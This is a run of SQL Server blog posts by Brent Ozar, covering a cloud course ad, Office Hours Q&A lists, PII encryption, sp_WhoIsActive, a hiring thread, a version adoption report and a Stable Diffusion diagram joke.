New Online Class: Running SQL Server in AWS and Azure

Cloud Computing
6 Comments

You’re used to managing your own SQL Servers in VMs, but now they’re asking you to work with the cloud.

You’re already comfortable installing, backing up, and performance tuning “regular” SQL Servers, and you just need to catch up with what’s different about the cloud.

You don’t want hype – you just want honest opinions from someone who doesn’t work for a cloud vendor.

In this recorded class, you’ll learn:

  • How to assess your current workloads
  • How to pick the right VM type for your workload
  • How to size storage for performance, not size
  • How to assess wait stats in cloud VMs
  • How to back up directly to cloud-native file systems
  • Where Azure Managed Instances & AWS RDS make sense

I’m Brent Ozar, and I’ve been managing client VMs in the cloud for over a decade. I’ll get you up to speed with unbiased facts, not hype, and save you valuable time as your career transitions to the next level.

To get started saving your company time and money, get the course for $195. Folks with a Recorded Class Season Pass: Fundamentals or a Level 2 Bundle can start watching the class right now under their account. Enjoy!


[Video] Office Hours: Six-Minute Speed Round

Videos
1 Comment

The morning after the Data TLV Summit in Tel Aviv, I stood out on the balcony and answered a few of your questions from https://pollgab.com/room/brento, rapid-fire style:

 

Here’s what we covered:

  • 00:00 Intros
  • 00:47 cyrpl: Hi Brent from PEI, Canada. A support person told me today that when creating a table, an ID column should almost be a default for every table. Do you agree? 98% of our tables do not have ID fields. Would adding ID fields to busy tables generally help query performance?
  • 01:15 Nas: What is quickest and short downtime way of migrating 7TB database on new storage old SAN (DELL) new SAN(HPE)?
  • 02:19 Simon Frazer: Have you come across scenarios where you feel SQL Server would’ve benefited from allowing more than 1 8k page for statistics?
  • 02:38 Ingibjorg: Do Postgres DBAs tend to have higher pay ceilings than MSQL DBAs?
  • 03:12 Ingibjorg: What tools / tests do you like to use when performance testing the network layer for a new SQL server?
  • 03:32 sp_blitz_says_myboss_is_a_rocket_scientist: in what cases should we create statistics ourselves?
  • 04:33 Does Basically Anything: Hi Brent! How would you recommend tuning when faced with a cursor query that has so many iterations that you can’t pull an actual execution plan when running it because it overwhelms SSMS?
  • 05:06 Ingibjorg: Management uses KPI’s to judge the developers. Management also wants KPI’s to evaluate the SQL production DBA. In addition to meeting RPO/RTO objectives, what are good / bad KPI’s for this? Tickets closed, peer review scores, etc?
  • 05:47 Mehmet: At what point should you ask dev to introduce app layer caching for a query that is rapidly re-executed?

[Video] Office Hours in Tel Aviv, Israel

Videos
2 Comments

Before speaking at the Data TLV Summit, I sat by the Mediterranean Sea and discussed the top-voted questions you posted at https://pollgab.com/room/brento.

Here’s what we covered:

  • 00:00 Start
  • 00:55 Manikandan GS: As postgres being one among the RDBMS lane, do you think postgres is having more features and flexibility compared to MS-SQL Server?
  • 02:46 PaginationWoo!: Hi Brent. I use Ola’s script to update stats nightly. Other than time spent and % CPU used, is there a case where updating stats with fullscan would be a bad thing? I’m fortunate in that I have a long maintenance window. If I have time for fullscans, wouldn’t it be worth doing?
  • 04:42 Adza: I had the thought of creating a date table with all dates ranging from 2010 to 2070 and have a smallint key for each date. Then in my tables I can store smallint values instead of actual dates. This could be a huge data saver (2 bytes vs 3 bytes). Smart or stupid? 05:53 Eyes Without a Face: Is there a portable version of the First Responder Kit? Our customers are mainly banks and they are not keen to install Stored Procedure. Not even the First Responder Kit
  • 06:44 Dawson from Dawsons Creek: Do you have any clue why Microsoft suggests to use a windows collation for new development work but the default server collation for English(US) is still a SQL collation? For all other Windows locale the default server collation is a windows collation.
  • 08:07 StillLearning: Hello Brent, as a Dev DBA I’ve recently became increasingly frustrated with computed columns and their limitations (filtered index…). Should I advise the dev teams to refrain from using them and do the computation in the app instead ? Thanks
  • 09:26 Haurun: What are the pros/cons of installing Ola Hallengren maintenance script tables / sp’s in master database vs some kind of maintenance db?
  • 10:42 Milind: Hi Brent, Thanks for your time. During execution of certain queries or SPs I am observing high logical reads. Where should I look to make sure it is appropriate or required improvement? Unfortunately, I haven’t completed all the training modules and asking this question.
  • 12:06 TheCuriousOne: Hi Brent! If you have to work with local SSDs in a server for your SQL setup, is it better to have one big array with OS side logical separation through partitioning or to have physical separation by setting up smaller disk-sets with various RAID configurations?

Office Hours: Gif Reactions Edition

Some of the questions y’all post at https://pollgab.com/room/brento are open-and-shut cases. I was going to do a one-word-answers edition, but I think this is even better: gifs.

GI Joe DBA: Thoughts about IT professionals Unionizing? IT professionals are in demand. Because of our demand, should we use this leverage to unionize, raise the bar, force better health benefits, retirement benefits, etc for ALL.. US Citizens? Ever discuss this with colleagues?

Rudy: Love the statistics parser web site. Will it remain around for the foreseeable feature? If not, is the source code freely available? 

Will Marshall: What are the common mistakes to avoid when coding sprocs that will crash SSMS during execution / debugging?

DBA_Mufasa: Salut Brent! Does using filegroups really help distribute I/O throughput and minimize disk contention if the ndf files for those filegroups still reside on the same logical volume?

Justsin: Do you ever like to use “SET STATISITCS XML ON” for troubleshooting stored procedures?

40 oz Coffee Breakfast: Do you have any experience with using DDBoost as a backup solution? My friend is currently using Ola’s scripts to backup to a Data Domain as a CIFs share. Storage team asks for us to use DDBoost but there is a concern about losing granularity of restores.

Dan: Any insight into why DB restores are unbelievable painful within Azure SQL, we seem to be averaging between 20-80 minutes with < 50% success on a less than 200mb db and results are still mixed regardless of if we do point in time or full restores.

Sql Padawan: Hi Brent! I’ve really enjoyed your Mastering courses. Especially the stories and analogies you use (like the one about pets wearing disguises). What do you recommend to create a successful online course? (btw, I’m not planning to create SQL Server courses 😀 )

Menahem: Does high plan cache turn over due to improper query parameterization adversely affect commercial SQL monitoring software?

Bart: Hi Brent. What’s the best way to convert UTC datatime to local datetime/date. I’ve been using this: CONVERT(DATETIME, SWITCHOFFSET(CONVERT(DATETIMEOFFSET, mydate.MODIFIEDDATETIME), DATENAME(TZOFFSET, SYSDATETIMEOFFSET()))) AS LOCALDATETIME

Will Marshall: What are the pros/cons of letting SQL create the temp table via SELECT INTO (i.e. SELECT into #MyTempTable) vs explicitly creating the temp table then inserting into it?

YouGottaDoWhatYouGottaDo: Hi Brent, do you know of a list of former “Best Practices” for SQL Server that have now become useless or even dangerous/harmful (due to engine/OS evolution)?

Menahem: Do any of your clients run their primary AG / HA SQL2019 node on prem and their secondary 2019 AG / HA node in Azure? Is this a bad idea?

And I’ll leave you with a bonus gif:


Most DBAs Say They’re Encrypting Personally Identifiable Data. Most.

Despite the continuous stream of data breaches, ransomware, and GDPR violations, some companies still aren’t encrypting personally identifiable information (PII) inside our databases or backups.

I see this all the time when working with clients, but I can’t exactly talk about that or give numbers, so I decided to take a highly unscientific poll on Twitter. I figure if DBAs are sitting around on social media, they’re probably done with all the important parts of their job. The 147 votes came in:

Hoping for more upbeat news, I also asked on LinkedIn, a more professional social media network, where maybe people do their jobs better? I’m just guessing, who knows:

The story was better, but it’s still sketchy. Depending on where you ask, one in five to one in three shops isn’t encrypting their personally identifiable information at all.

I actually have a hunch the number is much worse because in a social media poll, we’re just taking folks at their word. In reality, when I’ve lifted the covers to dig a little deeper with the business, we’ve found things like production data being restored to development servers, and stored unencrypted.

When I’ve discussed this with clients, some folks even say, “Yes, we’re encrypting data – we use encryption at rest at the storage level. Everything that hits disk is encrypted automatically.” Okay, great – now what happens when someone takes a backup? They can copy that backup anywhere they please, like writing directly to someone else’s Azure Blob Storage account or to Amazon S3, and you won’t get any errors or warnings. Storage-level encryption doesn’t stop data exfiltration.

It’s okay if you don’t have all of the answers, but as a database administrator, you should start by asking a few questions:

  • Where are we storing personally identifiable information?
  • Is that data encrypted, and how?
  • If it’s not encrypted, what’s the plan to get it encrypted? Is the business waiting on me to do something?
  • Has anyone given my manager and the company’s security & compliance departments those above answers in writing?

Asking those questions is the first step to getting your company to a safer place.


[Video] Office Hours: Ask Me Anything About SQL Server and Azure

Videos
5 Comments

Got questions about the Microsoft data platform? Post ’em at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. Today’s episode finds me in my home office in Vegas:

  • 00:00 Intros
  • 02:10 GeorgeDAX: Hello Brent, I’m a dealing with a huge sales table which contains around 500 columns with 50m rows. Business asks to add even more columns in the table. Should I break the table or keep adding columns to the same one? Performance wise, what’s the best approach?
  • 04:47 Brynjar: Do you have a suggested max column limit when designing new tables that require fast queries?
  • 05:58 Manuel Labour: What is the largest stored proc you ever had to optimize? How long did you spend on it?
  • 07:24 Yavin: When analyzing SQL memory use, what are healthy / unhealthy utilization ratios for MEMORYCLERK_SQLBUFFERPOOL, CACHESTORE_SQLCP, MEMORYCLERK_SQLGENERAL?
  • 08:21 Eduardo: Is it safe to run sp_blitzindex on a busy OLTP server (3000+ batches per second) during peak business hours or should this be done after hours?
  • 10:22 3rdNormalForm: HEAPS & Vendor Packages. I have a 43 million row table called transactionxlog with no keys and no CX. sp_blitzcache shows 7 queries against this table with costs of 883. I took the recommend composite index and made it into a clustered index. [UNIQUIFIER] what is it?
  • 12:05 DB_Architect_Chick: Hi Brent. I’m designing a new database for 50k inserts/selects (minimal updates) per hour. I am doing my best to make mature design decisions, but with no actual data to test against, do you have any suggestions for establishing an effective initial index strategy?
  • 15:22 Eduardo: What is your opinion of Intel QAT backup compression in SQL 2022?
  • 17:34 Vilhelms: Is there a good way to know when a query caused an auto stats update and how long the auto stats update took?
  • 19:39 Pete S: What is your opinion\thoughts on the “SQL Graph Database” feature that was introduced in SQL Server 2017? Have you worked with any clients that use it in production OR is this another “copy-cat” feature to keep up with the database Jones’?
  • 20:57 RaduDBA: Mr. Brent, with all the cloud solutions and cloud databases that take over the data landscape, like datawarehouses, lakehouses etc. is there still room for SQL Server and traditional on-prem databases? I work as a DBA and do a lot of performance tuning. Is my career doomed?
  • 23:43 cyrpl: Brent, can you suggest a stored procedure source control tool. We have gitlab for code source control but we specifically want to track all changes to SQL Server stored procedures.
  • 25:56 YouGottaDoWhatYouGottaDo: Hi Brent! Have you ever encountered a very toxic work environment (dictator-boss, widespread discontent etc.) that created problems for you during your consulting work (even 1-day consultancy)? How did you handle this?

Community Tools Month: Using sp_WhoIsActive to Catch ASYNC_NETWORK_IO

Monitoring
10 Comments

When your SQL Server’s top wait stat is ASYNC_NETWORK_IO, that indicates SQL Server is waiting on the app to ask for the next part of the result set.

This is a real pain in the rear to troubleshoot because often these waits happen for really short duration each time – think milliseconds, not seconds. It’s an issue of death by a thousand cuts.

The easiest way to get a quick idea what’s happening is to use sp_WhoIsActive (Github – releases) repeatedly with no pauses in between:

Here, I’m running a workload with a lot of short queries running simultaneously. If I just run sp_whoisactive now and then, I don’t see any activity – only a query or two now and then, and they’re rarely waiting on network. However, if I run it several times in a row, right away:

Then I can get a fast, seat-of-the-pants idea of which queries are waiting on networking. I can also scroll across to the right in the result set and see which app it’s coming from, which servers, which logins, etc.

This isn’t an exact science by any means, but when I’m working with a client, it helps me quickly get a rough idea of what’s going on. It helps me start a conversation about the kinds of queries we’re running, how much data we’re bringing back (both in terms of rows and columns), and find out whether the app servers might be underpowered or swapping to disk.

Clients have said things like:

  • “Oh, we had no idea that app was bringing back all of the columns, and that’s problematic since we added a few XML/JSON/MAX columns in the table since that query was written.”
  • “Oh, we had no idea that application was taking so long to digest the results of those queries. We can give that app server more memory.”
  • “Oh, we had no idea that it was bad if we ran the database server in one data center, and the app servers elsewhere.”

ASYNC_NETWORK_IO isn’t necessarily a bottleneck for SQL Server – fixing the above problems may not make a big performance difference overall for other users – so solving it is often a relatively low value during the engagement. sp_whoisactive helps me dedicate the appropriately small amount of time & effort into the problem, and then move on to the bigger problems.


[Video] Office Hours: Hotel Balcony Edition, Part 2

Videos
0

Post your questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered:

  • 00:00 Introductions
  • 00:59 Haydar: What tools do you like to use when troubleshooting azure sql db query performance issues?
  • 01:57 The Midhight Idol: Does the glitz and glamour of Vegas ever wear off or get old?
  • 02:48 Haydar: Would a PostgreSQL version of constant care see the same demand and success?
  • 03:23 Walcott: Which Intelligent Query Processing features do you like or dislike in SQL Server 2019 and 2022?
  • 04:18 Delete_Rule:Cascade: Good day Brent! I’m new to data warehousing and I was wondering what your thoughts are on using SSIS for ETL operations? Are there similar products out there that are better or is SSIS the go-to product?
  • 05:08 Nikolajs: What is the largest number of tenants you have seen inside a single multi-tenant SQL server instance? Did this pose any unique challenges?
  • 07:00 Morty: What are your thoughts on new SQL 2022 ledger functionality and it’s use cases?
  • 09:27 MyFriendtheDBA: I’m getting excited about PASS Summit this November (my first). Being a Seattle-neophyte, any restaurant/food truck/personal kitchen recommendations for the trip?
  • 11:42 Nomad: My friend copied a database with Windows authentication using the “detach and attach” method. The .mdf and .ldf file permissions changed and reattaching the database failed. Why did the file permissions change and what steps would you take to resolve this issue?
  • 12:36 Madiha: What’s your opinion of the query plan viewer in Azure Data Studio?
  • 14:13 CronullaStingray: Hi Brent. I ran blitzindex and got “Indexaphobia: High Value Missing Index” which I created without modifications. It’s been over a month and the dm_db_index_physical_stats user_seeks and user_scans are both showing 0s. But blitzindex still says I need to create it. Why is that?
  • 15:33 Anatoli: How do you know if query store is a good / bad fit for your SQL server 2019 enterprise instance?
  • 16:30 Anatoli: What are the risks of long running native SQL backups?

[Video] Office Hours: Hotel Balcony Edition, Part 1

Videos
1 Comment

Post your questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered today:

  • 00:00 Introductions
  • 00:25 Kebros: Hi Brent.My manager wants me to summarize sql health into a number 1-100 for all 50 production Servers.This is idiotic but just for Banter, what health metric (Eg I/O) will you advise me to use and average out (even if it doesn’t paint a whole picture) so I can feed my family.
  • 02:08 SwissDBA: Hi Brent, I inherited a database of 2 TB with 355 data files. How would you check (and prove to the business) if the database has too many data files? Even the biggest file is just 55 GB big and I believe the DB could be faster with much less data files.
  • 04:32 Britney: What are the common strategies you see used for recovering from “Oops” queries?
  • 05:40 LifeExtinguisher: Can rcsi improve backup speed? Considering backup reads the whole db and saves in bak file, and reads are routed to tempdb for older values, not needing shared lock on resource that already is booked by some other exclusive lock
  • 06:33 Sussudio: What tools / techniques do you recommend for generating large sudo realistic synthetic data loads for performance testing in the lower SQL environments?
  • 08:27 Dilara: When are SQL Server questions better suited for stackoverflow.com vs dba.stackexchange.com? Which forum has less snark?
  • 09:25 Lieutenant Dan: What are the top 4 SQL conferences ranked in order?
  • 11:33 Fyodor: What is your opinion / experience with using client side profilers like C# MiniProfiler to monitor SQL query performance?
  • 13:14 Does Basically Anything: Hi Brent! Regarding sp_databaserestore. I was wondering if you knew of anyone who wrote something open source that utilizes it for automating testing restores from multiple servers, multiple databases. Any clickholes I could venture down before I start building something myself?
  • 14:28 happydba: do you have a video of the baby sea turtles yet?!? 😀
  • 15:14 Haydar: What are your preferred scripts / tools for monitoring Always On latency?

Community Tools Month: Choose Your Character

This month on the blog is Community Tools Month, and I’m going to be talking about some of the most useful and influential tools out there.

You can’t learn them all – *I* can’t learn them all – because there just aren’t enough hours in the day to do your work, keep your skills sharp, take care of yourself, and take care of the ones you love.

So this month, think about a couple of things:

  • Can I use this tool to get my existing tasks done faster?
  • Do I want to keep doing these tasks in my next job?
  • What tasks do I wanna do in my next job?
  • Can I learn this tool to help me get my next job?

With that in mind, here’s something I use all the time with clients when I’m asking how many staff they have to support a particular application:

There are certainly more data-related jobs – BI developer, architect, data scientist, data engineer, etc – but let’s start here.

I know there are gonna be readers who say, “I do all of those tasks.” Sure you do – but you don’t do them well, and if you think you do, you’re deceiving yourself about what “well” means for any of those columns. You’ll be in for a world of surprise when you go to interview for a senior position in any of those columns, because senior = specialist.

With that in mind, for each of those columns, today I’m going to list a tool that I think is important for your next job.

If you want your next job to be Production DBA,
you should be learning dbatools.

In your current position, you may not manage enough servers to justify it. You might be content doing your work one server at a time, with the SSMS GUI and T-SQL. However, the Production DBA role at small companies will continue to evolve over the next decade, and your skills need to be ready for your next job. You want bigger responsibilities, and that means accomplishing more tasks, more quickly.

Get these two books and read them in order:

You’ll learn how the open source dbatools module helps you manage more servers, in less time, while making less errors.

Like any new tool, it’s going to be slower going for you at first – probably even for months. But when it’s time to get your next job, the one managing more servers in more environments, you’re going to be able to use the exact same techniques that you’ve already been practicing at your smaller job.

If you want your next job to be a Development DBA,
you should be learning sp_HumanEvents.

I’m not telling you to learn Extended Events – you can, sure, but you don’t need to. Erik Darling’s sp_HumanEvents automates the data collection AND, here’s the important part, the analysis, for the most common long-term problems that performance tuners need to solve. I don’t use Extended Events myself directly, ever, but I use sp_HumanEvents all the time.

To understand how powerful and useful it is, start with Erik’s 10-minute video on using it to troubleshoot blocking, compiles, and recompiles.

Then, go get it and read the documentation.

If you want your next job to be developer,
you should be learning MiniProfiler.

When your team builds software-as-a-service (SaaS) applications, sooner or later, you’re going to run into a problem with server performance analysis. SQL Server has historically struggled with this, and it’s getting even worse in SQL Server 2022.

Because of these problems, you’re going to be a much more effective developer if you can implement the free open source MiniProfiler to track which parts of your application are having performance problems, and which queries are causing those problems.

I’m not saying you have to be the one who analyzes the data, reads the queries, and tunes them. However, as a developer, you are the one who’s going to have to implement the data-collecting solution. This need is even more important in the cloud where performance costs pile up every month, and the urgency to fix ’em becomes even higher.

All 3 of these have something in common.

They’re on GitHub.

GitHub itself isn’t a community tool, but in 2022, GitHub is the tool where community open source happens. I’m not saying you have to learn GitHub or use it for your own code – it can be a real pain in the keister. But if you learn the basics of how to clone a project locally and keep it up to date, you’ll likely be better off no matter what your future job entails.


Office Hours, Short Text Answers Edition

Not all of the questions y’all post at https://pollgab.com/room/brento require long, thought-out answers. Some are just one-line specials, like these:

F’legend: Hi Brent, in reply to a question talking about database restores for 1TB+ you also touched on scrubbing or synthetic data as a way to populate dev environments. Are there any resources/tools you would suggest for these approaches?

Read this and the comments on it.

On Another Beach Somewhere: I am using multiple instances of SQL on the same VM. Brent says that’s a bad idea… lets pretend I have a good reason. How does Min/Max Memory come into play? Can I set both instances to the same “Max” and let them compete for memory or do I need to allocate a portion to each?

Congratulations. You just discovered one of many reasons why I told you it was a bad idea. Just wait til you discover CPU contention.

Steph: Hello Brent, is there a reason why SQL Server doesn’t seem to have shortcuts to compute stats on columns with unique constraint ? Why scan all rows when the density is always 1/count(*) and histograms seem useless ? This confuses me. Thanks.

Because some queries will do range scans, as in, show me all IDs between 1000 and 2000. SQL Server needs to know how many IDs exist in that range – some IDs may have been deleted. The only way to find out is to read the data.

Darin Webber: Hello Brent!! I need to change a datatype of 2 columns on a very large table.What would be the best approach for his operation? Creating 2 new columns and copying the data and then dropping the old ones, or there is another better approach? Will dropping the columns cause downtime?

Read this.

Tayyip: Is there an ideal index usage stats age band for when it’s safe to make decisions re: dropping rarely used NC indexes?

For me, if an index hasn’t been used in 32 days, it needs to go.

Don’t Blame Anthony: What is your opinion of using Pure FlashBlade to speed up SQL backups and restores?

I haven’t used it myself.

Daniel: Can you please please break down steps and the process of consuming data from an API (JSON format) using SSIS and then uploading that consumed data into a SQL Server database? Thanks!

I don’t use SSIS.

Bad DBA Taylor: We built a devops repo to deploy SQL permissions for service accounts, but due to the high volume (15k/batches/s) the release pipeline gets deadlocked on a very simple CREATE USER statement causes a massive SCH_M lock chain. Our security cache is 12gb. Could this be the problem?

If you think it is, try to flush that cache first as part of your deployment scripts. (I have a feeling it isn’t, though.)

RoJo: I want to add AG offsite. Can I use 2016 on-site and 2017 or 2019 offsite?

I would not do that, no. Failover would be one-way – you couldn’t fail back.

TeeJay: We recently had to do an unplanned over-the-top SQL upgrade from 2014 to 2017 in our prod environment (yes, bad, I know). I now have a bunch of fires to put out. Are there any obvious first places to look for new performance problems (like the cardinality estimator was for 2014)?

Indeed there are! Check out my Mastering Server Tuning class.

Eyes up here, kid
I look like WHAT?

Tayyip: What are the pros/cons of working as the sole SQL DBA vs working on a team of SQL DBA’s?

You can learn more, more quickly, by working with others. You also have to put up with them.

Alex: Hi Brent, You look like someone that is in pretty good shape. How do you balance your Work, Health & Mind in what can be a sedentary job. Especially because of Covid alot of people are not having to go into the office any more?

Read this.

Seshat: What are your thoughts on using SQL startup option -E for index rebuild / read ahead performance across multiple data files?

Never heard of it.

Sekhmet: What is your experience / opinion of using NVDIMM / PMEM as a high speed storage for SQL Server?

It’s dying.

Don’t Blame Anthony: How do you deal with undetected write errors in SQL server?

Detect them by running DBCC CHECKDB as frequently as practical – even overnight if your business windows allow it.

Anatoli: What interesting tools do you know of (besides SSMS / Sentry Plan Explorer) that will parse SQL query plans?

Quest Spotlight Tuning Pack is another one.

DBAInProgress: Hello Brent. What different screencast softwares have you used to overlay yourself onto your screen with audio?

Read this.

Piotr: What are your favorite DMV’s in Azure SQL DB?

I don’t have a separate set there – I try to use common ground between both Azure and SQL Server.

Fyodor: Do you have any guidelines for maximum number of columns to allow for the include columns in a NC index?

Yes, and we discuss them in my Mastering Index Tuning class.

Mahesh: When Sql is migrated to cloud will there be a change to RTO and RPO .

Yes.

DanishDBA: Hi Brent. My friend is going to implement logging requirements from customers. They want to see who changed a column value, date and old/new value. Is System-versioned Temporal Tables the recommended solution when performance is the main concern? What are your thoughts on this?

If performance is the main concern, only log the specific columns you care about. For example, you probably wouldn’t want to monitor high-velocity columns like QuantityInStock. When you only care about specific columns and specific sources, triggers are likely to be faster, and generate less transaction log activity.

Skrillex: How do you verify that it’s safe to upgrade DB compat mode to latest version? 2014 to 2019 in this case.

Read this.

Urquan: What percent of your clients license SQL by the server / core vs Microsoft Assurance?

Of course I have a straight face under here, why do you ask?

I don’t track that. I don’t sell licensing. I don’t even ask clients how they’re licensing it.

Guðmundur: For query perf testing, can you hint DB compat level at the query level vs changing for entire DB?

Read this.

Piotr: What is your opinion of external tables in Azure SQL DB? Do they perform any better than linked servers in on-prem SQL Server?

Never used ’em.

Elijah: Are there workflow orchestrators that you recommend as an alternative for SSIS? SSIS seems to have pain-points around metadata getting out of date, difficulty to review as code, and being difficult to debug for large workflows. However, nothing else seems to work with SQL Agent.

I don’t work with SSIS, so I’d post that on #SQLHelp.

Anatoli: What are the ideal display columns / column order when running sp_whoisactive to triage a server performance fire?

The defaults. Learn to use the defaults so that when you parachute into a server you’ve never seen before, you can work quickly.

Chenjesu: Do you see any interesting SQL alerting mechanisms at your clients other than email?

No.

Bryan Flores: Hello Brend, do you recommend sql server replication in 2019 or 2022, but do you recommend instead of replication

Come on, Ryan, that’s like asking if I recommend hammers. What’s the problem you’re trying to solve? Don’t ask if you should use a tool – describe the problem you’re facing, and then we can pick the right tool, Mr. Flowers.

Yehat: How do SQL DB snapshots compare with SAN snapshots as a potential rollback mechanism for a failed application deployment / update?

Most of the clients I work with have some kind of high availability and disaster recovery mechanism like log shipping, AGs, or SAN replication. You can’t roll back a database snapshot without affecting everything downstream. SAN snapshots have similar problems, but if you’re also using SAN replication for DR, the syncing back & forth is way easier.

The Swedish Chef: How do you project costs for hypothetical Azure SQL Managed instance against hypothetical SQL in Azure VM? Need to figure out who wins a bakeoff and migrate from on-prem.

Start by exactly quantifying your per-server costs to build, manage, and troubleshoot Always On Availability Groups for a single cluster. If you can’t do that, a true cost comparison is hopeless. (Hint: it’s hopeless.)

Anatoli: What is your opinion of the TSQL MERGE statement? Do you have any performance tips when using it?

Read this.

Sajawal: Please don’t say NO. How can we read an execution on Azure Synapse Analytics? Please help us in that world as well.

I’ve never used Synapse Analytics.

Yitzhak: Do SSMS live query stats ever get you over the performance finish line?

Yes, but read this.

Vilhelms: When do you like to use sp_blitzwho vs when do you like to use sp_whoisactive?

I answer that one in this module of my How I Use the First Responder Kit class.

Guðmundur: Which SQL locking model is easier for developers to understand and code? Optimistic or pessimistic locking?

Optimistic.

SQL_RAGE: How does referencing a column by an alias versus the column name influence SQL’s decision on which execution plan to use? Seeing SQL use a bad plan for a query using the aliased column column name in an ORDER BY, but uses a good plan when using the column alias.

Odds are, it’s unrelated to the alias, and related to optimization timeouts. I explain those in my Fundamentals of Query Tuning class.

Ramil: Hi Brent! App controls a lot of things like amount of database files-only one, indexes can be created only via app, partitioning is not allowed. How can I scale up horizontally in this case? because DB is growing 250gb per month. OLTP DB, currently 1.8 TB, in AlwaysOn AG.

I think you fundamentally misunderstand scaling terms. Scaling up vertically refers to adding hardware. Scaling out horizontally refers to adding more servers. In either case, this is pretty far beyond a free Office Hours question – feel free to click Consulting at the top of the screen before you make a multi-million-dollar licensing and hardware architecture plan.

Fyodor: Would you consider blogging a list of your top 10 most watched Ozar You Tube videos?

No, because people who aren’t smart enough to go to my YouTube channel, click Videos, and click Sort By aren’t smart enough to hold down database jobs anyway.


Who’s Hiring in the Database Community? September 2022 Edition

Who's Hiring
17 Comments

Is your company hiring for a database position as of September 2022? Do you wanna work with the kinds of people who read this blog? Let’s set up some rapid networking here. If your company is hiring, leave a comment.

The rules:

  • Your comment must include the job title, and either a link to the full job description, or the text of it. It doesn’t have to be a SQL Server DBA job, but it does have to be related to databases. (We get a pretty broad readership here – it can be any database.)
  • An email address to send resumes, or a link to the application process – if I were you, I’d put an email address because you may want to know that applicants are readers here, because they might be more qualified than the applicants you regularly get.
  • Please state the location and include REMOTE and/or VISA when that sort of candidate is welcome. When remote work is not an option, include ONSITE.
  • Please only post if you personally are part of the hiring company—no recruiting firms or job boards. Only one post per company. If it isn’t a household name, please explain what your company does.
  • Commenters: please don’t reply to job posts to complain about something. It’s off topic here.
  • Readers: please only email if you are personally interested in the job.

If your comment isn’t relevant or smells fishy, I’ll delete it. If you have questions about why your comment got deleted, or how to maximize the effectiveness of your comment, contact me.

Each month, I publish a new post in the Who’s Hiring category here so y’all can get the latest opportunities.


[Video] Fragmentation Explained in 20 Minutes at SQLBits

Index Maintenance, Videos
17 Comments

What does fragmentation mean? How does it happen? Can you fix it with fill factor? Should you rebuild your indexes to fix it?

At the SQLBits conference, I tried a new way of explaining it using markers and pieces of whiteboard paper as database pages, and doing inserts live on the fly.

What you see onscreen is actually what the in-person audience saw up on the projector. Prior to the session, I rigged up a tripod and camera aimed down at the desk so the audience could watch me work.

I had so much fun with this session, and I’m so proud of the results. I want to thank SQLBits for recording the sessions and making them freely available on YouTube, and the sponsors for making it possible!


SQL ConstantCare® Population Report: Summer 2022

Ever wonder how fast people are adopting new versions of SQL Server, or what’s “normal” out there for SQL Server adoption rates, hardware sizes, or numbers of databases? Let’s find out in the summer 2022 version of our SQL ConstantCare® population report.

Out of the 3,151 servers sending in data recently, the most popular version of SQL Server is still 2016:

This will be the last version of the report where I’ll break out 2008, 2008 R2, and 2012 separately. Going forward, I’ll just lump ’em under “2012 & Prior” since they’ll add up to even less the next time I do the report.

Mainstream support is over for SQL Server 2014 & 2016, so here’s a number that makes me a little nervous: only 55% of servers are under mainstream support. When SQL Server 2017’s mainstream support ends on October 22, that means only the 23% of users on SQL Server 2019, and the 13% in Azure SQL DB, will be getting regular updates. Yowza.

SQL Server 2016, 2017, and 2019 account for 69% of the user population, and Azure SQL DB took a big jump from about 1% up to about 11%.

Up in the cloud, Azure SQL DB jumped dramatically from 1% overall to about 13%, with 11% of that being Azure SQL DB itself, and Managed Instances at 2% of the population.

The newer products are at the top of this chart, and the new data’s at the right, so you can see the new stuff gradually pushing down the old stuff over time:

While the most popular version is still SQL Server 2016, this year 2019 is getting a lot closer. Every single version’s going down except SQL Server 2019 and Azure SQL DB.

These numbers help to give me perspective when I think about new adoptions of SQL Server 2022. It’s possible that SQL Server 2022 will gain adoption faster than 2019 did because I don’t think there were a whole lot of “I absolutely gotta have that” features in 2019. With 2022’s Availability Groups being able to fail back & forth to the cloud, if that ships in a solid, reliable, easy-to-troubleshoot way, that could be the killer feature that really spurs 2022 adoption.


Drawing Entity Relationship Diagrams with Stable Diffusion

Humor
3 Comments

Documenting your database and code is such a pain in the rear. Wouldn’t it be awesome if artificial intelligence could help?

Good news! There are a bunch of AI systems like Stable Diffusion and DALL-E that will draw things based on your text prompts. Forget the slow, tedious task of sketching out the relationships between your tables, and let the machines do the hard work for you.

For examples, give this prompt to Stable Diffusion: entity relationship diagram, database, microsoft, sql server, table, unreal engine, ultra realistic

In the interest of speed, I’m only generating 512×512 pixel images, but… I tell you what, if I wanted to pull a joke on a project manager, it’d be pretty funny to generate a whole folder of high-resolution ones, print them out, and gesture at them as I quickly flip through the pages, saying, “We’ve done a spectacular amount of work documenting our database, the application, and its process flows.”

That’s all well and good, but … I think we can do better.

Thomas Kinkade’s Database Diagrams

Why not turn our database diagrams into something our parents would be proud to frame and hang on their walls? I mean, the Painter of Light is not my thing, but he brings a certain something to our databases.

prompt: entity relationship diagram!!!, database, art by thomas kinkade

He really brings our documentation to life. Our databases and apps are often a lot like trees – insert dead wood joke here, ha ha ho ho.

What if your style is a little more tech modern? I got you, fam.

Anime Database Diagrams

prompt: entity relationship diagram!!, database, art by greg rutkowski and wlop and artgerm

Right? RIGHT?!? That is bad ass. Now THAT is the kind of database documentation I actually wanna read. I want that on a poster in my office. I want that as a poster in my BEDROOM.

But sometimes, you’re working with an application that’s a little more… creative.

Salvador Dali’s Database Diagrams

Ever wonder how the surrealist painter would diagram out the relationships between his tables? Me too. I think about it all the time. It’s time to answer that vital question.

Prompt I used: entity relationship diagram, database, salvador dali, surreal

   

I hereby call on ERStudio to add Salvador Dali filter. This is what the world needs today.

Too much for you? Want to ease things up a little?

Super Mario’s Entity Relationship Diagrams

I used a variety of prompts for these – it took a lot of experimentation because Stable Diffusion kept trying to just show Mario on top of diagrams, which wasn’t really what I wanted:

I think… that last one is a representation of Super Mario as … a database architect? That’s wonderful, and it sent me down another rabbit hole:

Prompt: super mario holding an entity relationship diagram printout in his hand

This is a wonderful fantasy world – however, let’s get back to today. Let’s find out more about the kinds of folks who have to work with this documentation.

Database administrator at work

Prompt I used: database administrator at work in the office, unreal engine, ultra realistic

 

